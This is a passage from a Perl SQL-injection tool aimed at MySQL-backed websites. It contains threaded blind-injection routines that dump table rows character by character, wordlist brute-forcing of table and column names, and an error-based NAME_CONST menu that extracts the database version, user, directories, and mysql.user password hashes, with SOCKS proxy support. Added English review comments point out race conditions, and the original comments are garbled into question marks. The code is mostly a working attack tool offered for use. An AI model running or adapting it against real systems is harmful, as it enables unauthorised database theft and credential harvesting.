  3061.     print FILE1  "-----------------------------------------\n";
  3062.     print FILE1  "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
  3063.     print FILE1  "-----------------------------------------\n";
  3064.     print "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
  3065.     print "-----------------------------------------\n";
  3066.     print "Do you want add condition to sql-query?\n";
  3067.     print "----------\n";
  3068.     print "for example - where id=1 ? (1/0): ";
  3069.     $choice11 = <STDIN>;
  3070.     chomp $choice11;
  3071.     $condition=0;
  3072.     if ($choice11==1) {
  3073.         print "-----------------------------------------\n";
  3074.         print "Enter your condition here - only one condition, without 'where', '+' and quotes, example - id=1 :\n";
  3075.         print "----------\n";
  3076.         $choice11 = <STDIN>;
  3077.         chomp $choice11;
  3078.         $where = $choice11;
  3079.         print "Your condition: [ where $where ]\n";
  3080.         $condition=1;
  3081.     } else {
  3082.         $condition=0;
  3083.     }
  3084.     if ($condition==0) {
  3085.          $turbo_flag = 0;
  3086.          # ?????? ???-?? ?????? ??????? #
  3087.          print "-----------------------------------\n";
  3088.          print "Count data from [ $table_name  ]:\n";
  3089.          # ?????? ???-?? ?????? ??????? #
  3090.          print "-----------------------------------\n";
  3091.          ## ???????? ##
  3092.          $bl_lenght = "";
  3093.          $ii = 0;
  3094.          $bl_column_number_DATA = "";
  3095.          $bl_current = "(select" . $bl_plus .  "count(*)" . $bl_plus . "from" . $bl_plus . $table_name . ")";
  3096.             if ($bl_mode==0) {
  3097.                    $bl_lenght = len_check();
  3098.             } else {
  3099.                    $bl_lenght = len_check1();
  3100.             }
  3101.          if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  3102.                 print "Count ALL DATA from " . $table_name .  "[length]:" .  $bl_lenght . "\n";
  3103.                 for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  3104.                    if ($bl_mode==0) {
  3105.                       $bl_column_number_DATA .= get_res_count();
  3106.                    } else {
  3107.                       $bl_column_number_DATA .= get_res_count1();
  3108.                    }
  3109.                    print $bl_column_number_DATA . "\r";
  3110.                    sleep $pause;
  3111.                 }
  3112.                 print "\n------------------------------------------------------\n";
  3113.                 print "Count ALL DATA from " . $table_name . " [value]:" . $bl_column_number_DATA . "\n";
  3114.                 print "--------------------------------------------------------\n";
  3115.                 print "Normal MODE - records > 10\n";
  3116.                 print "Fast MODE - records <= 10\n";
  3117.                 print "TURBO-MODE - 1 record, 1 column\n";
  3118.                 print "MD5-TURBO-MODE - 1 record, 1 column, MD5-hash\n";
  3119.                 print "-----------------------------------------\n";
  3120.         } else {
  3121.                 print "Cant't get data...\n";
  3122.         }
  3123.         $mflag = 0;
  3124.         print "-----------------------------------\n";
  3125.         $time = localtime;
  3126.         print $time . "\n";
  3127.         print "-----------------------------------\n";
  3128.          ## start from2 ##
  3129.          print "Get ALL data from " . $table_name . " (" . $bl_column_number_DATA . ") ? (1/0): ";
  3130.          $choice = <STDIN>;
  3131.          chomp $choice;
  3132.          $thr = $kol_threads; # ???-?? ???????
  3133.          if ($choice == 1) {
  3134.               $num = -1; # ?? ????????
  3135.          } else {
  3136.               print "Enter START_position: ";
  3137.               $choice1 = <STDIN>;
  3138.               chomp $choice1;
  3139.               $num = $choice1-1;
  3140.               print "Enter END_position: ";
  3141.               $choice2 = <STDIN>;
  3142.               chomp $choice2;
  3143.               $bl_column_number_DATA = $choice2-1;
  3144.               print "Dump records from [" . ($num+2) . "] to [" . ($bl_column_number_DATA+1) . "]\n";
  3145.               $rec_number = ($bl_column_number_DATA+1) - ($num+2);
  3146.               if ($rec_number == 0) {
  3147.                  print "\n---------------------------------------------------------------\n";
  3148.                  print "Dump just one record, switching to TURBO-MODE....check\n";
  3149.                  ($x,$y) = split (/,/,$column_name);
  3150.                  if ($y) {
  3151.                       "\n---------------------------------------------------------------\n";
  3152.                       print "Sorry, just one column for TURBO-MODE\n";
  3153.                       "---------------------------------------------------------------\n";
  3154.                       $turbo_flag = 0;
  3155.                  } else {
  3156.                       print "\n---------------------------------------------------------------\n";
  3157.                       print "Detecting just one column & one record - is it MD5-HASH? (1/0): ";
  3158.                       $choice_t = <STDIN>;
  3159.                       chomp $choice_t;
  3160.                       if ($choice_t == 1) {
  3161.                              $turbo_flag = 2;
  3162.                              print "=======================================================\n";
  3163.                              print "MD5-TURBO-MODE GRANTED\n";
  3164.                              print "=======================================================\n";
  3165.                       } else {
  3166.                              $turbo_flag = 1;
  3167.                              print "=======================================================\n";
  3168.                              print "TURBO-MODE GRANTED\n";
  3169.                              print "=======================================================\n";
  3170.                       }
  3171.                  }
  3172.  
  3173.               }
  3174.          }
  3175.          print "-----------------------------------------\n";
  3176.          print "Request method - $method\n";
  3177.          print "Threads - $kol_threads\n";
  3178.          print "Proxy - $proxy_message\n";
  3179.          print "----------------------\n";
  3180.          ## end from2
  3181.          # ?????? ?????? ?? ??????? #
  3182.          $bl_lenght = "";
  3183.          $ii = 0;
  3184.          $s = 0;
  3185.          print "Get columns [$column_name] from [$table_name]:\n";
  3186.          print "------------------------\n";
  3187.          for(0..$thr) {
  3188.             $trl[$_] = threads->create(\&gets104);
  3189.          }
  3190.          for(0..$thr) {
  3191.             $trl[$_]->join;
  3192.          }
  3193.          $time = localtime;
  3194.          print $time . "\n";
  3195.          print "----------------------\n";
                 # Thread entry point for the "dump all records" path; takes no
                 # arguments and returns nothing.  The only state shared between
                 # workers is the row counter $num (declared :shared at the top of
                 # the file); every other variable below is an unshared global, so
                 # under ithreads each worker operates on its own copy.  $bl_plus,
                 # $bl_mode, $mflag, $turbo_flag, $pause, $column_name, $table_name
                 # and $bl_column_number_DATA are set by the caller before the
                 # threads are created.  Output goes to STDOUT and to FILE1, which
                 # the caller opens beforehand and closes after the join.
  3196.          sub gets104 {
  3197.                 $| = 1; # autoflush so the "\r" progress lines show up immediately
  3198.                 while ($num < $bl_column_number_DATA) {
  3199.                 { lock($num);
  3200.                 $num++; } # claim the next row index under the lock
                        # NOTE(review): both reads of $num below happen outside the
                        # lock, so a concurrent increment can make two workers
                        # request the same LIMIT offset, or skip one.
  3201.                 $sss = $num;
                        # Subquery for row $num with the requested columns joined by
                        # 0x3a (':').  len_check*/get_res_* take no arguments, so
                        # they presumably pick $bl_current up as a global.
  3202.                 $bl_current = "(select" . $bl_plus .  "concat_ws(0x3a," . $column_name . ")" . $bl_plus . "from" . $bl_plus . $table_name . $bl_plus . "limit" . $bl_plus . $num . ",1)";
  3203.                 if ($turbo_flag == 2) {
  3204.                     $bl_lenght = 32; # MD5-TURBO: fixed 32-char length, no length probe
  3205.                 } else {
  3206.                      if ($bl_mode==0) {
  3207.                          $bl_lenght = len_check();
  3208.                      } else {
  3209.                          $bl_lenght = len_check1();
  3210.                      }
  3211.                 }
                        # Sanity bound on the probed length; rows outside it are
                        # skipped silently (no message, nothing written to FILE1).
  3212.                 if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  3213.                       print "\nRecord limit $sss,1 [length]:" .  $bl_lenght . "\n";
                              # In the visible code $mflag is set to 0 right before
                              # this path, so this branch only runs if it is set to
                              # 1 elsewhere.
  3214.                       if ($mflag == 1) {
  3215.                           ############################################################
                                  # NOTE(review): %aa is cleared but never read; the
                                  # hash actually used is the ref returned into $aa.
  3216.                           %aa = ();
  3217.                           if ($turbo_flag == 0) {$aa = gets1000();}
  3218.                           if ($turbo_flag == 1) {$aa = TURBO();}
  3219.                           if ($turbo_flag == 2) {$aa = md5();}
  3220.                           $data1 = "";
                                  # Reassemble the value in numeric key order.  The
                                  # comma before `for` is a trailing list comma:
                                  # harmless, but easy to misread.
  3221.                           $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  3222.                           #############################################################
  3223.                       } else {
                                  # Normal mode: one get_res_* call per character position.
  3224.                           $data1 = "";
  3225.                           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  3226.                              if ($bl_mode==0) {
  3227.                                 $data1 .= chr(get_res_normal());
  3228.                              } else {
  3229.                                 $data1 .= chr(get_res_normal1());
  3230.                              }
  3231.                               print $data1 . "\r";
  3232.                           }
  3233.                       }
  3234.                       print "\n-----------------------------------\n";
  3235.                       print "  ---> Record limit $sss,1: " . $data1 . "\n";
  3236.                       print "-----------------------------------\n";
  3237.                       print FILE1 "  ---> Record limit $sss,1: " . $data1 . "\n"; # FILE1 is opened/closed by the caller
  3238.                 }
  3239.                 sleep $pause; # per-request delay, configured elsewhere
  3240.                 }
  3241.          }
  3242.          print "----------\n";
  3243.          print "Saved in " . "z_" . $host3 . ".txt\n";
  3244.          close(FILE1);
  3245.          goto START10;
  3246.     } else {
  3247.     ## ?????? ?????? ?? ??????? ##
  3248.          $turbo_flag = 0;
  3249.          print "Count data from [ $table_name  ] with [ where " . $where . " ] \n";
  3250.          # ?????? ???-?? ?????? ??????? #
  3251.          print "-----------------------------------\n";
  3252.          ## ???????? ##
  3253.          $bl_lenght = "";
  3254.          $ii = 0;
  3255.          $bl_column_number_DATA = "";
  3256.  
  3257.          $bl_current = "(select" . $bl_plus .  "count(*)" . $bl_plus . "from" . $bl_plus . $table_name . $bl_plus . "where" . $bl_plus . $where . ")";
  3258.             if ($bl_mode==0) {
  3259.                    $bl_lenght = len_check();
  3260.             } else {
  3261.                    $bl_lenght = len_check1();
  3262.             }
  3263.          if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  3264.                 print "Count ALL DATA from " . $table_name .  "[length]:" .  $bl_lenght . "\n";
  3265.                 for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  3266.                    if ($bl_mode==0) {
  3267.                       $bl_column_number_DATA .= get_res_count();
  3268.                    } else {
  3269.                       $bl_column_number_DATA .= get_res_count1();
  3270.                    }
  3271.                    print $bl_column_number_DATA . "\r";
  3272.                    sleep $pause;
  3273.                 }
  3274.                 print "\n------------------------------------------------------\n";
  3275.                 print "Count ALL DATA from " . $table_name . " [value]:" . $bl_column_number_DATA . "\n";
  3276.                 print "--------------------------------------------------------\n";
  3277.                 print "Normal MODE - records > 10\n";
  3278.                 print "Fast MODE - records <= 10\n";
  3279.                 print "TURBO-MODE - 1 record, 1 column\n";
  3280.                 print "MD5-TURBO-MODE - 1 record, 1 column, MD5-hash\n";
  3281.                 print "-----------------------------------------\n";
  3282.         } else {
  3283.                 print "\n------------------------------------------------------\n";
  3284.                 print "Cant't get data...\n";
  3285.                 print "------------------------------------------------------\n";
  3286.         }
  3287.         print "-----------------------------------\n";
  3288.         $mflag = 0;
  3289.         $time = localtime;
  3290.         print $time . "\n";
  3291.         print "-----------------------------------\n";
  3292.          ## start from2 ##
  3293.          print "Get ALL data from " . $table_name . " (" . $bl_column_number_DATA . ") ? (1/0): ";
  3294.          $choice = <STDIN>;
  3295.          chomp $choice;
  3296.          $thr = $kol_threads; # ???-?? ???????
  3297.          if ($choice == 1) {
  3298.               $num = -1; # ?? ????????
  3299.          } else {
  3300.               print "Enter START_position: ";
  3301.               $choice1 = <STDIN>;
  3302.               chomp $choice1;
  3303.               $num = $choice1-1;
  3304.               print "Enter END_position: ";
  3305.               $choice2 = <STDIN>;
  3306.               chomp $choice2;
  3307.               $bl_column_number_DATA = $choice2-1;
  3308.               print "Dump records from [" . ($num+2) . "] to [" . ($bl_column_number_DATA+1) . "]\n";
  3309.               $rec_number = ($bl_column_number_DATA+1) - ($num+2);
  3310.               if ($rec_number == 0) {
  3311.                  print "\n---------------------------------------------------------------\n";
  3312.                  print "Dump just one record, switching to TURBO-MODE....check\n";
  3313.                  ($x,$y) = split (/,/,$column_name);
  3314.                  if ($y) {
  3315.                       "\n---------------------------------------------------------------\n";
  3316.                       print "Sorry, just one column for TURBO-MODE\n";
  3317.                       "---------------------------------------------------------------\n";
  3318.                       $turbo_flag = 0;
  3319.                  } else {
  3320.                       print "\n---------------------------------------------------------------\n";
  3321.                       print "Detecting just one column & one record - is it MD5-HASH? (1/0): ";
  3322.                       $choice_t = <STDIN>;
  3323.                       chomp $choice_t;
  3324.                       if ($choice_t == 1) {
  3325.                              $turbo_flag = 2;
  3326.                              print "=======================================================\n";
  3327.                              print "MD5-TURBO-MODE GRANTED\n";
  3328.                              print "=======================================================\n";
  3329.                       } else {
  3330.                              $turbo_flag = 1;
  3331.                              print "=======================================================\n";
  3332.                              print "TURBO-MODE GRANTED\n";
  3333.                              print "=======================================================\n";
  3334.                       }
  3335.                  }
  3336.  
  3337.               }
  3338.          }
  3339.          print "-----------------------------------------\n";
  3340.          print "Request method - $method\n";
  3341.          print "Threads - $kol_threads\n";
  3342.          print "Proxy - $proxy_message\n";
  3343.          print "----------------------\n";
  3344.          ## end from2
  3345.          # ?????? ?????? ?? ??????? #
  3346.          $bl_lenght = "";
  3347.          $ii = 0;
  3348.          $s = 0;
  3349.          print "Get columns from $table_name:\n";
  3350.          print "------------------------\n";
  3351.          for(0..$thr) {
  3352.             $trl[$_] = threads->create(\&gets105);
  3353.          }
  3354.          for(0..$thr) {
  3355.             $trl[$_]->join;
  3356.          }
  3357.          $time = localtime;
  3358.          print $time . "\n";
  3359.          print "----------------------\n";
                 # Thread entry point for the "dump records matching WHERE" path;
                 # no arguments, no return value.  Identical in structure to
                 # gets104: workers share only the row counter $num (declared
                 # :shared at the top of the file) and claim indices under lock();
                 # the remaining globals ($bl_plus, $bl_mode, $mflag, $turbo_flag,
                 # $pause, $column_name, $table_name, $where,
                 # $bl_column_number_DATA) are set by the caller and are per-worker
                 # copies under ithreads.  Output goes to STDOUT and to FILE1,
                 # which the caller opens and closes.
  3360.          sub gets105 {
  3361.                 $| = 1; # autoflush so the "\r" progress lines show up immediately
  3362.                 while ($num < $bl_column_number_DATA) {
  3363.                 { lock($num);
  3364.                 $num++; } # claim the next row index under the lock
                        # NOTE(review): $num is read again below, outside the lock;
                        # a concurrent increment can duplicate or skip an offset.
  3365.                 $sss = $num;
                        # Same subquery as gets104 plus the user-supplied $where
                        # clause.  len_check*/get_res_* take no arguments and
                        # presumably read $bl_current as a global.
  3366.                 $bl_current = "(select" . $bl_plus .  "concat_ws(0x3a," . $column_name . ")" . $bl_plus . "from" . $bl_plus . $table_name . $bl_plus . "where" . $bl_plus . $where . $bl_plus . "limit" . $bl_plus . $num . ",1)";
  3367.                 if ($turbo_flag == 2) {
  3368.                     $bl_lenght = 32; # MD5-TURBO: fixed 32-char length, no length probe
  3369.                 } else {
  3370.                     if ($bl_mode==0) {
  3371.                        $bl_lenght = len_check();
  3372.                     } else {
  3373.                        $bl_lenght = len_check1();
  3374.                     }  
  3375.                 }
                        # Sanity bound on the probed length; rows outside it are
                        # skipped silently.
  3376.                 if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  3377.                       print "\nRecord limit $sss,1 [length]:" .  $bl_lenght . "\n";
                              # $mflag is set to 0 just before this path in the
                              # visible code; this branch needs it set to 1 elsewhere.
  3378.                       if ($mflag == 1) {
  3379.                           ############################################################
                                  # NOTE(review): %aa is never read; the data comes
                                  # back as a hash ref in $aa.
  3380.                           %aa = ();
  3381.                           if ($turbo_flag == 0) {$aa = gets1000();}
  3382.                           if ($turbo_flag == 1) {$aa = TURBO();}
  3383.                           if ($turbo_flag == 2) {$aa = md5();}
  3384.                           $data1 = "";
                                  # Reassemble in numeric key order (trailing comma
                                  # before `for` is harmless).
  3385.                           $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  3386.                           #############################################################
  3387.                       } else {
                                  # Normal mode: one get_res_* call per character position.
  3388.                           $data1 = "";
  3389.                           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  3390.                              if ($bl_mode==0) {
  3391.                                 $data1 .= chr(get_res_normal());
  3392.                              } else {
  3393.                                 $data1 .= chr(get_res_normal1());
  3394.                              }
  3395.                               print $data1 . "\r";
  3396.                           }
  3397.                       }
  3398.                       print "\n-----------------------------------\n";
  3399.                       print "  ---> Record limit $sss,1: " . $data1 . "\n";
  3400.                       print "-----------------------------------\n";
  3401.                       print FILE1 "  ---> Record limit $sss,1: " . $data1. "\n"; # FILE1 is opened/closed by the caller
  3402.                 }
  3403.                 sleep $pause; # per-request delay, configured elsewhere
  3404.                 }
  3405.          }
  3406.          print "----------\n";
  3407.          print "Saved in " . "z_" . $host3 . ".txt\n";
  3408.          close(FILE1);
  3409.          goto START10;
  3410.     }
  3411. }
        # Blind-mode submenu [11]: wordlist checks for table names ([1]) and
        # column names ([2]), each run by a pool of threads that share only
        # the counter $num.  Results are echoed and appended to the
        # "z_<host>.txt" report.  $host3, $source_table_list,
        # $source_column_list, $bl_url, $bl_plus, $bl_filtr, $pause and
        # $kol_threads are all set before this block is reached.
  3412. if ($choice==11) {
  3413.    START11:
  3414.    print "    [1] Brute table\n";
  3415.    print "    [2] Brute column\n";
  3416.    print "    [3] Main menu\n";
  3417.    print "----------\n";
  3418.    $choice = <STDIN>;
  3419.    chomp $choice;
  3420.    print "Your choice: $choice\n";
  3421.    print "-------------\n";
  3422.    if ($choice == 1) {
           # NOTE(review): two-arg open with the result unchecked; a failure
           # only surfaces as warnings on the later prints to FILE1.
  3423.        open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # report file, appended
  3424.        print "   Brute tables\n";
  3425.        print "   -------------\n";
  3426.        print FILE1 "   Brute tables\n";
  3427.        print FILE1 "   -------------\n";
               # Wordlist path is set elsewhere.  The open is unchecked, so a
               # missing file silently yields an empty @tables4 and $size == 0.
  3428.        open(FILE, "<", $source_table_list);
  3429.        while(<FILE>) {
  3430.          chomp;
  3431.          push(@tables4, $_);
  3432.        }
  3433.        close(FILE);
  3434.        print "Add prefix for brute tables ? ( for example - PHPBB_ ) (1/0): ";
  3435.        $choice = <STDIN>;
  3436.        chomp $choice;
  3437.        if ($choice == 1) {
  3438.               print "Enter your prefix for brute tables: ";
  3439.               $choice = <STDIN>;
  3440.               chomp $choice;
  3441.               $pref_brute = $choice; # prepended verbatim to every wordlist entry
  3442.        } else {
  3443.               $pref_brute = "";
  3444.        }
  3445.        $size = 0;
  3446.        $size = @tables4; # scalar assignment: number of wordlist entries
  3447.        print "File: $source_table_list\n";
  3448.        print "Tables: $size\n";
  3449.        print "-------------\n";
  3450.        print "Request method - $method\n";
  3451.        print "Threads - $kol_threads\n";
  3452.        print "Proxy - $proxy_message\n";
  3453.        print "----------------------\n";
  3454.        $thr = $kol_threads; # number of worker threads (global setting)
  3455.        $num = -1; # reset the shared counter; first index claimed is 0
               # 0..$thr is inclusive, so $thr + 1 workers are started.
  3456.        for(0..$thr) {
  3457.             $trl[$_] = threads->create(\&gets106);
  3458.        }
  3459.        for(0..$thr) {
  3460.             $trl[$_]->join;
  3461.        }
               # Thread entry point for [1].  Each iteration claims one index
               # from the shared counter and issues one request whose query
               # contains a boolean subquery against the candidate name; a
               # wr_check() result of 1 is treated as "exists".  wr_check()
               # takes no arguments and presumably reads $bl_query as a global.
  3462.        sub gets106 {
  3463.             $| = 1; # autoflush for the "\r" progress counter
  3464.             while ($num<$size) {
  3465.                { lock($num);
  3466.                $num++; }
  3467.                $chek_len20 = 0;
                      # NOTE(review): $num is read outside the lock, and with
                      # several workers it can pass $#tables4 near the end of the
                      # list, leaving $current1 equal to the bare prefix.
  3468.                $current1 = $pref_brute . $tables4[$num];
  3469.                $bl_query = $bl_url . $bl_plus . "and" . $bl_plus . "(select" . $bl_plus . "1" . $bl_plus . "from" . $bl_plus . $current1 . $bl_plus . "limit" . $bl_plus . "0,1)=1" . $bl_filtr;
  3470.                $chek_len20 = wr_check();
  3471.                if($chek_len20 == 1) {
  3472.                     print "   ---> " . $current1 . "\n";
  3473.                     print FILE1 "  "  . $current1 . "\n";
  3474.                }
  3475.                print $num . "\r"; # progress counter
  3476.                sleep $pause; # per-request delay, configured elsewhere
  3477.  
  3478.             }
  3479.        }
  3480.        print "----------\n";
  3481.        print "Saved in " . "z_" . $host3 . ".txt\n";
  3482.        close(FILE1);
  3483.        goto START11;
  3484.    }
  3485.    if ($choice == 2) {
             # NOTE(review): two-arg open, result unchecked (same as branch [1]).
  3486.          open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # report file, appended
  3487.          print "   Brute columns\n";
  3488.          print "   -------------\n";
  3489.          print FILE1 "   Brute columns\n";
  3490.          print FILE1 "   -------------\n";
  3491.          print "Enter the table_name for brute: \n";
  3492.          $choice = <STDIN>;
  3493.          chomp $choice;
  3494.          $table = $choice; # used verbatim in every probe below
  3495.          print "Brute columns for table [ " . $table . " ]\n";
  3496.          print "-------------\n";
                 # Wordlist path is set elsewhere; unchecked open, so a missing
                 # file silently yields an empty @columns4.
  3497.          open(FILE, "<", $source_column_list);
  3498.          while(<FILE>) {
  3499.             chomp;
  3500.             push(@columns4, $_);
  3501.          }
  3502.          close(FILE);
  3503.        print "Add prefix for brute columns? ( for example - PHPBB_ ) (1/0): ";
  3504.        $choice = <STDIN>;
  3505.        chomp $choice;
  3506.        if ($choice == 1) {
  3507.               print "Enter your prefix for brute columns: ";
  3508.               $choice = <STDIN>;
  3509.               chomp $choice;
  3510.               $pref_brute = $choice;
  3511.        } else {
  3512.               $pref_brute = "";
  3513.        }
  3514.          $size = 0;
  3515.          $size = @columns4; # number of wordlist entries
  3516.          print "-------------\n";
  3517.          print "File: $source_column_list\n";
  3518.          print "Columns: $size\n";
  3519.          print "-------------\n";
  3520.          print "Request method - $method\n";
  3521.          print "Threads - $kol_threads\n";
  3522.          print "Proxy - $proxy_message\n";
  3523.          print "----------------------\n";
  3524.          $thr = $kol_threads; # number of worker threads (global setting)
  3525.        $num = -1; # reset the shared counter; first index claimed is 0
  3526.        for(0..$thr) {
  3527.             $trl[$_] = threads->create(\&gets107);
  3528.        }
  3529.        for(0..$thr) {
  3530.             $trl[$_]->join;
  3531.        }
               # Thread entry point for [2]; same loop as gets106 but the probe
               # references the candidate column of $table.  wr_check() takes
               # no arguments and presumably reads $bl_query as a global.
  3532.        sub gets107 {
  3533.             $| = 1; # autoflush for the "\r" progress counter
  3534.             while ($num<$size) {
  3535.                { lock($num);
  3536.                $num++; }
  3537.                $chek_len20 = 0;
                      # NOTE(review): $num read outside the lock; can run past
                      # $#columns4 with several workers (see gets106).
  3538.                $current1 = $pref_brute . $columns4[$num];
  3539.                $bl_query = $bl_url . $bl_plus . "and" . $bl_plus . "(select" . $bl_plus . "mid(concat(1," . $current1 . "),1,1)" . $bl_plus . "from" . $bl_plus . $table . $bl_plus . "limit" . $bl_plus .  "0,1)=1" . $bl_filtr;
  3540.                $chek_len20 = wr_check();
  3541.                if($chek_len20 == 1) {
  3542.                     print "   ---> " . $current1 . "\n";
  3543.                     print FILE1 "  "  . $current1 . "\n";
  3544.                }
  3545.                print $num . "\r"; # progress counter
  3546.                sleep $pause; # per-request delay, configured elsewhere
  3547.  
  3548.             }
  3549.        }
  3550.        print "----------\n";
  3551.        print "Saved in " . "z_" . $host3 . ".txt\n";
  3552.        close(FILE1);
  3553.        goto START11;
  3554.    }
  3555.    if ($choice == 3) {
  3556.        goto START10; # back to the blind-mode main menu (label defined earlier in the file)
  3557.    }
  3558. }
        # [12] leaves blind mode and jumps back to the top-level menu; the
        # START label is defined outside this section.
  3559. if ($choice == 12) {
  3560.   goto START;
  3561. }
  3562. }# end blind
  3563. ## mysql name_const ##
  3564. if ($choice == 11) {
  3565. if ($nc_url =~ m/^https:\/\/?([^\/]+)/i) {
  3566.    $host6 = $1;
  3567.    $https_flag = 1;
  3568.    print "----------------------\n";
  3569.    print "HTTPS mode enabled\n";
  3570.    print "----------------------\n";
  3571. }
  3572. $host = $host6;
  3573. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
  3574.     print "-----------------------------------------\n";
  3575.     print "Authorization required, wait please....";
  3576.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
  3577.     $ck1 = collect($answ1);
  3578.     $https_auth_check = 1;
  3579.     print " DONE\n";
  3580.     print "-----------------------------------------\n";
  3581. }
  3582. if ($use_socks == 1 && $socks_check == 0) {
  3583.   $check_url = $host;
  3584.   our $query = "GET / HTTP/1.$http_protocol\r\n"
  3585.            . "Host: $check_host\r\n"
  3586.            . "Referer: http://" . $check_url . "\r\n"
  3587.            . "Accept: */*\r\n"
  3588.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
  3589.            . "Connection: close\r\n\r\n";
  3590.    print "----------------------------------------\n";
  3591.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
  3592.    print "Timeout = 5 sec:\n";
  3593.    print "----------------------------------------\n";
  3594.    $socks_check = 0;
  3595.    $check_socks = socks_check();
  3596.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  3597.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  3598.   if ($current_proxy_host) {
  3599.      $socks_check = 1;
  3600.      print "Will use --> $proxy_message\n";
  3601.   } else {
  3602.      $socks_check = 0;
  3603.      $proxy_message = "No";
  3604.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
  3605.   }
  3606. }
  3607. START200:
  3608. print "-----------------------------------------\n";
  3609. print "               Choose mode:\n";
  3610. print "-----------------------------------------\n";
  3611. print "    [1]  NAME_CONST - Mysql inj system information\n";
  3612. print "    [2]  NAME_CONST - get DB-names from information_schema.schemata\n";
  3613. print "    [3]  NAME_CONST - get tables from DB-name\n";
  3614. print "    [4]  NAME_CONST - get column_name from tables from DB-name\n";
  3615. print "    [5]  NAME_CONST - Mysql inj get tables from information_schema (current DB)\n";
  3616. print "    [6]  NAME_CONST - Mysql inj get column_name from table (current DB)\n";
  3617. print "    [7]  NAME_CONST - Mysql inj get data from columns\n";
  3618. print "-----------------------------------------\n";
  3619. print "    [8]  Main menu\n";
  3620. print "-----------------------------------------\n";
  3621. $choice = <STDIN>;
  3622. chomp $choice;
  3623. print "Your choice: $choice\n";
  3624. if ($choice==1) {
  3625.      open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
  3626.      #### ?????? ?????? #####################################################
  3627.      $temp = $sql_pref1 . "concat(0x7665723a,version())" . $sql_pref2;
  3628.      $nc_start1 = $nc_start . $temp;
  3629.      $nc_midle1 = $nc_midle . $temp;
  3630.      $url1 = $nc_start1 . $nc_midle1 . $nc_end;
  3631.      $nc_start1 = "";
  3632.      $nc_midle1 = "";
  3633.      #### ?????? ??? ???? #####################################################
  3634.      $temp = $sql_pref1 . "concat(0x626173653a,database())" . $sql_pref2;
  3635.      $nc_start1 = $nc_start . $temp;
  3636.      $nc_midle1 = $nc_midle . $temp;
  3637.      $url2 = $nc_start1 . $nc_midle1 . $nc_end;
  3638.      $nc_start1 = "";
  3639.      $nc_midle1 = "";
  3640.      #### ?????? ????? #####################################################
  3641.      $temp = $sql_pref1 . "concat(0x757365723a,user())" . $sql_pref2;
  3642.      $nc_start1 = $nc_start . $temp;
  3643.      $nc_midle1 = $nc_midle . $temp;
  3644.      $url3 = $nc_start1 . $nc_midle1 . $nc_end;
  3645.      $nc_start1 = "";
  3646.      $nc_midle1 = "";
  3647.      #### ?????? @@basedir #####################################################
  3648.      $temp = $sql_pref1 . "concat(0x626173656469723a," .  "@@" . "basedir)" . $sql_pref2;
  3649.      $nc_start1 = $nc_start . $temp;
  3650.      $nc_midle1 = $nc_midle . $temp;
  3651.      $url4 = $nc_start1 . $nc_midle1 . $nc_end;
  3652.      $nc_start1 = "";
  3653.      $nc_midle1 = "";
  3654.      #### ?????? @@datadir #####################################################
  3655.      $temp = $sql_pref1 . "concat(0x646174616469723a," .  "@@" . "datadir)" . $sql_pref2;
  3656.      $nc_start1 = $nc_start . $temp;
  3657.      $nc_midle1 = $nc_midle . $temp;
  3658.      $url5 = $nc_start1 . $nc_midle1 . $nc_end;
  3659.      $nc_start1 = "";
  3660.      $nc_midle1 = "";
  3661.      #### ?????? @@tmpdir #####################################################
  3662.      $temp = $sql_pref1 . "concat(0x746d706469723a," .  "@@" . "tmpdir)" . $sql_pref2;
  3663.      $nc_start1 = $nc_start . $temp;
  3664.      $nc_midle1 = $nc_midle . $temp;
  3665.      $url6 = $nc_start1 . $nc_midle1 . $nc_end;
  3666.      $nc_start1 = "";
  3667.      $nc_midle1 = "";
  3668.      #### ?????? @@version_compile_os #####################################################
  3669.      $temp = $sql_pref1 . "concat(0x6f733a," .  "@@" . "version_compile_os)" . $sql_pref2;
  3670.      $nc_start1 = $nc_start . $temp;
  3671.      $nc_midle1 = $nc_midle . $temp;
  3672.      $url7 = $nc_start1 . $nc_midle1 . $nc_end;
  3673.      $nc_start1 = "";
  3674.      $nc_midle1 = "";
  3675.      #### ?????? mysql.user #####################################################
  3676.      $temp = "(select" . $nc_plus . $sql_pref1 . "concat(0x6d7973716c2e757365723a,user)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "mysql.user)";
  3677.      $nc_start1 = $nc_start . $temp;
  3678.      $nc_midle1 = $nc_midle . $temp;
  3679.      $url8 = $nc_start1 . $nc_midle1 . $nc_end;
  3680.      $nc_start1 = "";
  3681.      $nc_midle1 = "";
  3682.      #### ?????? mysql.password #####################################################
  3683.      $temp = "(select" . $nc_plus . $sql_pref1 . "concat(0x6d7973716c2e70617373776f72643a,password)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "mysql.user)";
  3684.      $nc_start1 = $nc_start . $temp;
  3685.      $nc_midle1 = $nc_midle . $temp;
  3686.      $url9 = $nc_start1 . $nc_midle1 . $nc_end;
  3687.      $nc_start1 = "";
  3688.      $nc_midle1 = "";
  3689.      #### ?????? file_priv #####################################################
